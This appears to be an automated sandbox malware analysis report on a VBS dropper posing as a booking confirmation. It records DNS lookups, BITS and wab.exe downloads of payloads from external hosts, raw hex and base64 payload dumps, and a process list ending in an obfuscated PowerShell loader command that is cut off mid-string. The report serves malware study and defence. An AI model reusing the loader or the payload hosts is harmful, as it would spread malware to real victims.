                                                        Mar 18, 2024 08:08:40.491811991 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492382050 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.492449999 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492456913 CET44349753195.54.178.4192.168.2.5
                                                        Mar 18, 2024 08:08:40.492496967 CET49753443192.168.2.5195.54.178.4
                                                        Mar 18, 2024 08:08:40.492536068 CET44349753195.54.178.4192.168.2.5
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Mar 18, 2024 08:07:32.377424002 CET | 192.168.2.5 | 1.1.1.1 | 0xabc6 | Standard query (0) | brustiaalfa.websin.it | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:12.325293064 CET | 192.168.2.5 | 1.1.1.1 | 0xe959 | Standard query (0) | maso.ge | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:17.038511038 CET | 192.168.2.5 | 1.1.1.1 | 0x1e28 | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:17.135411024 CET | 192.168.2.5 | 1.1.1.1 | 0x77e8 | Standard query (0) | rnnfibiteammony.duckdns.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:27.902820110 CET | 192.168.2.5 | 1.1.1.1 | 0x5d65 | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:33.229437113 CET | 192.168.2.5 | 1.1.1.1 | 0x9f01 | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:38.513396025 CET | 192.168.2.5 | 1.1.1.1 | 0x40aa | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:43.477565050 CET | 192.168.2.5 | 1.1.1.1 | 0xed6e | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:48.368124962 CET | 192.168.2.5 | 1.1.1.1 | 0x6a43 | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:53.337568998 CET | 192.168.2.5 | 1.1.1.1 | 0xb8be | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:58.305768967 CET | 192.168.2.5 | 1.1.1.1 | 0xb650 | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:09:03.274326086 CET | 192.168.2.5 | 1.1.1.1 | 0xff07 | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:09:08.243176937 CET | 192.168.2.5 | 1.1.1.1 | 0x22fa | Standard query (0) | tolatilbu.hopto.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Mar 18, 2024 08:07:32.936949968 CET | 1.1.1.1 | 192.168.2.5 | 0xabc6 | No error (0) | brustiaalfa.websin.it | | 89.40.227.248 | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:12.853003979 CET | 1.1.1.1 | 192.168.2.5 | 0xe959 | No error (0) | maso.ge | | 195.54.178.4 | A (IP address) | IN (0x0001) | false |
| Mar 18, 2024 08:08:17.238898993 CET | 1.1.1.1 | 192.168.2.5 | 0x77e8 | No error (0) | rnnfibiteammony.duckdns.org | | 180.214.236.46 | A (IP address) | IN (0x0001) | false |

• brustiaalfa.websin.it
• maso.ge
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.5 | 49732 | 89.40.227.248 | 443 | 4568 | C:\Windows\System32\svchost.exe |

Timestamp: 2024-03-18 07:07:33 UTC, Bytes transferred: 166, Direction: OUT, Data:
HEAD /Produktionshallens.thn HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: brustiaalfa.websin.it

Timestamp: 2024-03-18 07:07:33 UTC, Bytes transferred: 209, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Mon, 18 Mar 2024 07:07:28 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
Accept-Ranges: bytes
Content-Length: 483156


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.5 | 49733 | 89.40.227.248 | 443 | 4568 | C:\Windows\System32\svchost.exe |

Timestamp: 2024-03-18 07:07:34 UTC, Bytes transferred: 217, Direction: OUT, Data:
GET /Produktionshallens.thn HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMT
User-Agent: Microsoft BITS/7.8
Host: brustiaalfa.websin.it

Timestamp: 2024-03-18 07:07:34 UTC, Bytes transferred: 209, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Mon, 18 Mar 2024 07:07:29 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
Accept-Ranges: bytes
Content-Length: 483156
                                                        Data Ascii: EBy7p3WwzjgWqNkOVkrFvyVYT4bVXiyStmrUlhf3h4bGHQYy3TeU1wQQ54alxatw4Tc2IL/NdN8NF7GFoUW3lobUnQ1PfWKKGtyiU/gehNstwG5FRwiI6mHMh48nKn90LjZ2F7Ir/3/uhcRMPT30uxjrKEAD1yT7ePk7T7wtb2GU7/DtqE37HyPkurTHuPlYG8uXpV5l4vUclZWYrkMYhEtXN2xvAQ9hJoBCNDJchw9EeOEiFhZCLyEph336Ux4
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 5a 58 32 38 79 35 63 33 44 65 67 5a 4e 2b 52 30 6c 41 45 48 68 6e 53 6a 62 68 65 5a 4e 79 55 57 68 6c 76 48 68 74 55 6d 4c 64 35 65 66 6c 2b 6d 38 7a 52 6a 39 4f 55 6e 31 47 30 54 67 57 6d 4a 78 6e 51 34 58 61 75 51 74 58 51 55 46 70 5a 50 30 78 2b 33 56 57 71 38 43 57 65 50 50 44 45 50 59 48 63 4d 51 75 37 55 7a 6c 41 52 4e 64 68 42 72 59 67 74 67 55 45 4f 74 4f 56 76 4d 55 57 39 66 45 68 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 79 4d 6a 6d 73 53 41 37 67 30 77 74 68 69 71 52 76 54 57 4a 32 66 73 56 33 2b 50 56 56 34 71 4c 6e 38 2b 61 61 39 34 6e 42 45 61 39 42 56 68 76 6d 50 7a 50 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 4e 50 47 32 72
                                                        Data Ascii: ZX28y5c3DegZN+R0lAEHhnSjbheZNyUWhlvHhtUmLd5efl+m8zRj9OUn1G0TgWmJxnQ4XauQtXQUFpZP0x+3VWq8CWePPDEPYHcMQu7UzlARNdhBrYgtgUEOtOVvMUW9fEhtgX8wLYF/MC2BfzAtgX8wLYF/MC2BfzAtgyMjmsSA7g0wthiqRvTWJ2fsV3+PVV4qLn8+aa94nBEa9BVhvmPzPYF/MC2BfzAtgX8wLYF/MC2BfzAtgX8wLYNPG2r
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 63 7a 67 74 67 78 4d 6a 49 66 6a 6c 4a 32 2b 48 71 7a 77 6c 67 58 38 74 66 78 54 46 4e 70 6d 4e 64 7a 41 73 59 50 4e 48 4d 35 4c 68 4e 64 68 43 4c 59 51 74 67 55 45 46 74 49 6c 76 4d 53 4a 2f 53 7a 77 6c 67 58 37 6e 68 49 35 6a 50 42 77 59 55 43 34 70 54 41 41 48 65 48 6d 63 63 69 6c 4f 6c 6f 47 50 52 33 76 2b 56 63 51 78 7a 57 4e 76 49 7a 41 74 67 33 6a 63 44 74 45 66 5a 42 4f 32 50 6a 41 39 67 42 45 33 49 63 58 50 46 43 2b 47 30 77 53 64 70 58 2f 58 42 42 74 34 7a 33 33 2b 59 7a 78 45 43 52 69 32 4b 6d 55 67 43 4f 6c 5a 6e 4d 59 70 6a 65 46 63 35 62 32 63 56 69 6c 50 6e 4c 44 4d 64 44 48 63 43 37 5a 6d 45 69 4a 74 64 77 34 66 78 48 38 67 4c 4f 39 37 6e 37 6b 43 33 45 4d 7a 6c 33 4d 30 4c 59 48 32 42 7a 44 48 62 46 6f 72 56 33 4d 30 4c 59 45 63 74 37 33
                                                        Data Ascii: czgtgxMjIfjlJ2+HqzwlgX8tfxTFNpmNdzAsYPNHM5LhNdhCLYQtgUEFtIlvMSJ/SzwlgX7nhI5jPBwYUC4pTAAHeHmccilOloGPR3v+VcQxzWNvIzAtg3jcDtEfZBO2PjA9gBE3IcXPFC+G0wSdpX/XBBt4z33+YzxECRi2KmUgCOlZnMYpjeFc5b2cVilPnLDMdDHcC7ZmEiJtdw4fxH8gLO97n7kC3EMzl3M0LYH2BzDHbForV3M0LYEct73


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.5 | 49734 | 89.40.227.248 | 443 | 4568 | C:\Windows\System32\svchost.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-03-18 07:07:41 UTC | 166 | OUT | HEAD /Produktionshallens.thn HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: brustiaalfa.websin.it
                                                        2024-03-18 07:07:41 UTC | 209 | IN | HTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:07:36 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 483156


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.5 | 49736 | 89.40.227.248 | 443 | 4568 | C:\Windows\System32\svchost.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-03-18 07:07:42 UTC | 217 | OUT | GET /Produktionshallens.thn HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMT
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: brustiaalfa.websin.it
                                                        2024-03-18 07:07:42 UTC | 209 | IN | HTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:07:37 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 483156


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.5 | 49743 | 195.54.178.4 | 443 | 5548 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-03-18 07:08:13 UTC | 181 | OUT | GET /wp-admin/Klassespecifikke.vbs HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: maso.ge
                                                        Cache-Control: no-cache
                                                        2024-03-18 07:08:13 UTC | 212 | IN | HTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:13 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:23:38 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 266951
                                                        Connection: close
                                                        Content-Type: text/vbscript


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49744 | 89.40.227.248 | 443 | 5548 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-18 07:08:15 UTC | 195 | OUT | GET /zwDhHUJEmBIkUtXcwKsarX186.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: brustiaalfa.websin.it
    Cache-Control: no-cache
2024-03-18 07:08:16 UTC | 249 | IN | HTTP/1.1 200 OK
    Date: Mon, 18 Mar 2024 07:08:11 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Last-Modified: Mon, 18 Mar 2024 01:25:04 GMT
    Accept-Ranges: bytes
    Content-Length: 236096
    Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49748 | 195.54.178.4 | 443 | 4568 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-18 07:08:28 UTC | 152 | OUT | HEAD /wp-admin/Reciteret.rar HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.8
    Host: maso.ge
2024-03-18 07:08:29 UTC | 227 | IN | HTTP/1.1 200 OK
    Date: Mon, 18 Mar 2024 07:08:28 GMT
    Server: Apache
    Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
    Accept-Ranges: bytes
    Content-Length: 429872
    Connection: close
    Content-Type: application/x-rar-compressed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49749 | 195.54.178.4 | 443 | 4568 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-18 07:08:29 UTC | 203 | OUT | GET /wp-admin/Reciteret.rar HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMT
    User-Agent: Microsoft BITS/7.8
    Host: maso.ge
2024-03-18 07:08:30 UTC | 227 | IN | HTTP/1.1 200 OK
    Date: Mon, 18 Mar 2024 07:08:29 GMT
    Server: Apache
    Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
    Accept-Ranges: bytes
    Content-Length: 429872
    Connection: close
    Content-Type: application/x-rar-compressed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49752 | 195.54.178.4 | 443 | 4568 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-18 07:08:38 UTC | 152 | OUT | HEAD /wp-admin/Reciteret.rar HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.8
    Host: maso.ge
2024-03-18 07:08:38 UTC | 227 | IN | HTTP/1.1 200 OK
    Date: Mon, 18 Mar 2024 07:08:38 GMT
    Server: Apache
    Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
    Accept-Ranges: bytes
    Content-Length: 429872
    Connection: close
    Content-Type: application/x-rar-compressed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49753 | 195.54.178.4 | 443 | 4568 | C:\Windows\System32\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-18 07:08:39 UTC | 203 | OUT | GET /wp-admin/Reciteret.rar HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Mon, 18 Mar 2024 01:22:31 GMT
    User-Agent: Microsoft BITS/7.8
    Host: maso.ge
2024-03-18 07:08:39 UTC | 227 | IN | HTTP/1.1 200 OK
    Date: Mon, 18 Mar 2024 07:08:39 GMT
    Server: Apache
    Last-Modified: Mon, 18 Mar 2024 01:22:31 GMT
    Accept-Ranges: bytes
    Content-Length: 429872
    Connection: close
    Content-Type: application/x-rar-compressed
                                                        Data Ascii: YTUCqZBJN3CjE5ijkEPFXwB7S0J7WagSzFCgjwFmFvy7TQasHdut3AfN0/3gedSUkNvnHAHsIQwjOdi0qffuqZx70fw+vvGdC0ZrJSTw5mURYO2FRsJmITVmP/JNDwpdO1noPG93tnI7UOlijnxi9wZajihv/opE+xkPZdont3Z/nKBTCvyI68twod9X7G7LmQSarFxgsEnfxjOldkj2gItEaGjfJVxKb7jaqtpm/j+7XR38e1moPHtqOFkLs1i
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 31 45 51 76 4e 32 72 41 4a 6b 36 73 35 46 69 58 6a 6e 48 2b 71 36 46 79 67 31 6e 5a 4b 6f 51 53 67 31 65 77 36 76 44 70 6e 77 4d 72 72 41 4d 57 52 7a 6f 69 36 41 71 65 39 64 77 77 55 4a 71 45 36 6d 54 78 76 34 71 56 61 44 78 37 57 61 67 38 53 6e 41 6a 57 6a 55 59 4b 30 66 6d 44 36 63 33 72 42 45 46 73 32 4f 4f 64 55 41 71 4f 66 79 45 52 68 43 63 72 56 41 4a 55 74 69 33 51 43 57 52 48 7a 6e 6c 4e 56 38 64 75 72 6f 34 6d 61 33 6e 2b 31 6d 6f 50 48 74 5a 6e 73 47 73 30 64 55 64 4d 78 56 61 56 53 4d 73 46 56 4b 79 67 6c 44 31 4a 4a 6c 41 69 78 37 69 7a 52 70 41 44 39 49 57 4b 57 74 41 57 42 62 56 6a 47 63 62 45 71 45 6e 6a 64 39 4c 54 32 37 31 51 31 44 4c 30 78 39 4c 74 43 6b 31 43 6e 31 5a 54 6a 72 76 55 68 6f 2b 78 4b 42 4a 66 31 57 6a 67 4b 4b 51 72 63 49
                                                        Data Ascii: 1EQvN2rAJk6s5FiXjnH+q6Fyg1nZKoQSg1ew6vDpnwMrrAMWRzoi6Aqe9dwwUJqE6mTxv4qVaDx7Wag8SnAjWjUYK0fmD6c3rBEFs2OOdUAqOfyERhCcrVAJUti3QCWRHznlNV8duro4ma3n+1moPHtZnsGs0dUdMxVaVSMsFVKyglD1JJlAix7izRpAD9IWKWtAWBbVjGcbEqEnjd9LT271Q1DL0x9LtCk1Cn1ZTjrvUho+xKBJf1WjgKKQrcI
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 68 63 2b 69 2f 5a 6b 72 44 62 49 4c 7a 34 68 43 75 6a 47 39 39 75 7a 6a 73 61 68 37 32 62 78 53 48 2b 76 49 72 5a 73 6c 37 71 36 58 51 34 68 4d 48 4a 51 62 69 46 6b 64 38 6d 50 41 7a 35 2f 42 6c 38 32 61 6f 74 55 44 31 68 31 45 53 70 72 63 58 79 67 49 39 31 36 37 6b 75 57 54 76 64 4e 66 72 45 2f 4b 66 4c 69 5a 37 4e 4e 37 57 61 67 38 65 31 6d 55 43 4f 54 73 58 4d 48 7a 37 5a 49 50 36 6d 56 56 6e 5a 78 4f 6d 4f 6e 55 33 6f 4b 56 6c 44 6e 56 68 79 75 69 4c 4a 77 4b 34 44 73 52 37 33 76 70 6a 61 44 6b 70 47 31 36 32 30 73 42 2b 57 71 6a 35 4a 6f 4d 51 6b 64 52 4e 43 33 6f 30 6d 34 45 4c 73 64 43 66 36 6d 55 74 6a 55 62 74 62 6e 56 36 4e 62 59 4d 46 77 4b 6e 4b 65 6c 30 67 77 50 48 67 4c 62 35 35 73 31 61 62 63 37 46 65 47 6d 72 47 39 67 76 66 31 49 44 2f 62
                                                        Data Ascii: hc+i/ZkrDbILz4hCujG99uzjsah72bxSH+vIrZsl7q6XQ4hMHJQbiFkd8mPAz5/Bl82aotUD1h1ESprcXygI9167kuWTvdNfrE/KfLiZ7NN7Wag8e1mUCOTsXMHz7ZIP6mVVnZxOmOnU3oKVlDnVhyuiLJwK4DsR73vpjaDkpG1620sB+Wqj5JoMQkdRNC3o0m4ELsdCf6mUtjUbtbnV6NbYMFwKnKel0gwPHgLb55s1abc7FeGmrG9gvf1ID/b
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 4d 6f 78 79 5a 5a 34 51 51 79 53 56 70 37 50 48 64 34 33 4b 33 7a 79 5a 4b 44 78 45 68 4f 45 6f 46 52 52 74 34 44 76 35 32 48 4a 61 6c 35 58 63 42 77 55 6d 4c 6d 7a 35 31 46 4f 6e 51 78 45 63 43 77 34 69 6f 56 52 4e 54 78 34 44 6d 65 72 62 49 74 66 5a 34 37 79 72 32 77 4b 55 73 2b 76 74 54 75 72 4e 37 58 72 77 75 52 35 2b 44 4e 38 78 52 4f 6b 49 4e 37 4d 31 55 74 53 61 4c 53 6b 64 62 6b 79 6e 66 6b 74 58 33 71 71 62 4a 67 55 77 73 34 64 2b 5a 6d 66 66 71 67 57 34 6d 64 54 67 75 31 6d 6f 50 48 74 5a 6d 4d 50 61 65 58 6e 53 74 4b 35 54 54 75 53 37 53 54 39 58 52 44 63 4c 64 39 6b 6b 37 35 61 46 72 75 33 65 6f 70 30 33 6d 78 4b 68 4d 67 69 34 57 76 2b 37 48 6e 52 38 65 31 6d 6f 50 48 74 6f 61 74 44 69 65 7a 65 53 4f 6b 6d 6b 39 58 47 6e 30 56 38 47 52 7a 39
                                                        Data Ascii: MoxyZZ4QQySVp7PHd43K3zyZKDxEhOEoFRRt4Dv52HJal5XcBwUmLmz51FOnQxEcCw4ioVRNTx4DmerbItfZ47yr2wKUs+vtTurN7XrwuR5+DN8xROkIN7M1UtSaLSkdbkynfktX3qqbJgUws4d+ZmffqgW4mdTgu1moPHtZmMPaeXnStK5TTuS7ST9XRDcLd9kk75aFru3eop03mxKhMgi4Wv+7HnR8e1moPHtoatDiezeSOkmk9XGn0V8GRz9
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 6b 35 72 71 2f 35 69 67 33 50 79 37 54 6e 2b 44 6c 69 65 6f 50 48 74 6a 68 70 73 37 6d 59 72 64 42 56 6d 6f 50 47 39 33 76 47 47 36 6c 32 56 63 69 4b 32 51 4d 51 71 37 47 4f 79 36 49 31 75 47 6f 6f 77 50 48 67 4c 5a 36 5a 73 31 4b 6e 51 36 44 77 46 56 42 65 6d 65 64 75 71 4a 69 65 6e 73 6f 58 2b 74 42 6c 54 51 59 34 74 53 76 46 31 47 2b 4b 71 30 76 59 30 65 38 62 49 50 44 67 68 6a 4a 47 38 66 2f 48 74 61 53 32 43 48 4a 6c 66 71 65 79 75 5a 76 45 78 71 75 66 54 2f 67 77 32 64 44 72 43 43 44 30 76 67 68 53 65 6f 32 57 64 71 52 59 34 78 61 44 4f 39 2b 43 62 77 67 67 6b 57 36 54 4d 69 67 41 51 43 6d 43 49 62 56 5a 33 70 6c 4a 58 64 6e 33 6c 35 31 64 66 44 74 4c 2b 63 43 72 6c 49 5a 38 66 35 31 66 54 57 38 44 6f 70 33 48 76 52 76 6a 54 2b 79 55 34 6b 33 76 52
                                                        Data Ascii: k5rq/5ig3Py7Tn+DlieoPHtjhps7mYrdBVmoPG93vGG6l2VciK2QMQq7GOy6I1uGoowPHgLZ6Zs1KnQ6DwFVBemeduqJiensoX+tBlTQY4tSvF1G+Kq0vY0e8bIPDghjJG8f/HtaS2CHJlfqeyuZvExqufT/gw2dDrCCD0vghSeo2WdqRY4xaDO9+CbwggkW6TMigAQCmCIbVZ3plJXdn3l51dfDtL+cCrlIZ8f51fTW8Dop3HvRvjT+yU4k3vR
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62
                                                        Data Ascii: ABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABb
                                                        2024-03-18 07:08:39 UTC8000INData Raw: 6c 55 41 36 50 6c 31 58 6b 66 30 52 50 72 36 2f 4d 43 4b 4e 7a 30 54 58 33 44 45 79 69 73 32 56 37 33 65 30 66 48 74 5a 70 32 56 72 41 65 47 2f 6d 43 44 42 50 4c 74 50 71 45 79 5a 75 4d 61 38 4f 31 6d 78 73 67 38 6f 61 4f 58 39 55 2b 39 79 43 66 6e 6b 39 38 68 57 4d 5a 77 33 71 58 57 64 63 6e 6e 6f 35 53 2f 39 47 6b 47 4b 7a 6e 57 6b 65 44 76 46 62 54 76 5a 71 42 50 2b 48 4c 2f 51 47 79 51 58 70 52 32 42 79 51 4f 62 4a 41 52 6f 68 35 47 78 67 59 76 66 6c 75 58 61 4c 77 68 48 37 74 45 6c 77 46 74 6e 4d 7a 77 48 75 30 56 74 4f 39 6d 6f 41 63 75 6b 4a 6b 7a 61 59 42 6e 38 6d 52 4b 45 6d 6a 56 74 53 48 43 69 51 6d 57 36 47 77 62 33 44 67 77 5a 71 44 2b 59 44 4e 69 44 68 49 41 4a 54 4a 73 54 62 79 69 69 39 69 59 4f 6d 78 56 38 41 7a 62 56 43 55 6a 5a 4e 4d 4e
                                                        Data Ascii: lUA6Pl1Xkf0RPr6/MCKNz0TX3DEyis2V73e0fHtZp2VrAeG/mCDBPLtPqEyZuMa8O1mxsg8oaOX9U+9yCfnk98hWMZw3qXWdcnno5S/9GkGKznWkeDvFbTvZqBP+HL/QGyQXpR2ByQObJARoh5GxgYvfluXaLwhH7tElwFtnMzwHu0VtO9moAcukJkzaYBn8mRKEmjVtSHCiQmW6Gwb3DgwZqD+YDNiDhIAJTJsTbyii9iYOmxV8AzbVCUjZNMN


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.2.5 | 49763 | 195.54.178.4 | 443 | 6380 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-03-18 07:09:10 UTC | 174 | OUT | GET /wp-admin/gGzbBm204.bin HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: maso.ge
                                                        Cache-Control: no-cache
                                                        2024-03-18 07:09:10 UTC | 223 | IN | HTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:09:10 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:20:21 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 189504
                                                        Connection: close
                                                        Content-Type: application/octet-stream


                                                        Target ID:0
                                                        Start time:08:07:09
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs"
                                                        Imagebase:0x7ff62f920000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:07:21
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn 